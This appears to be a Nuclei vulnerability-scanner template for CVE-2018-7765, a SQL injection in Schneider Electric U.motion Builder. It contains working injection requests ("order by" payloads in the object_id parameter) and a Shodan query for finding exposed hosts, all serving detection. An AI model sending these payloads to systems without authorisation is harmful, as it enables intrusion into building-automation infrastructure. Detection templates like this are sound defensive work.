id: CVE-2018-7765

info:
  name: Schneider Electric U.motion Builder - SQL Injection
  author: daffainfo
  severity: high
  description: |
    The vulnerability exists within processing of track_import_export.php in Schneider Electric U.motion Builder software versions prior to v1.3.4. The underlying SQLite database query is subject to SQL injection on the object_id input parameter.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to version v1.3.4 or later.
  reference:
    - http://seclists.org/fulldisclosure/2019/May/26
    - https://www.schneider-electric.com/en/download/document/SEVD-2018-095-01/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2018-7765
    cwe-id: CWE-89
    epss-score: 0.06089
    epss-percentile: 0.90915
    cpe: cpe:2.3:a:schneider-electric:u.motion_builder:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-requests: 2
    vendor: schneider-electric
    product: u.motion_builder
    shodan-query: http.headers_hash:1985490094
  tags: cve,cve2018,schneider-electric,sqli,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        op=export&language=english&interval=1&object_id=1' order by 1-- -

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'Object', 'Period') && !contains(body,'Invalid argument supplied for foreach')"
          - "contains(content_type, 'application/octet-stream')"
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        op=export&language=english&interval=1&object_id=1' order by 2-- -

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'Object', 'Period', 'Invalid argument supplied for foreach')"
          - "contains(content_type, 'application/octet-stream')"
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502200b98caf4d8bcfed033b843510d568069ea503a0f1f69afb73b9354802d8fe8a0022100e329f66b510a4e889406bd590a156e22f4766eb2f856c626c59eac4fffbe1065:922c64590222798bb761d5b6d8e72950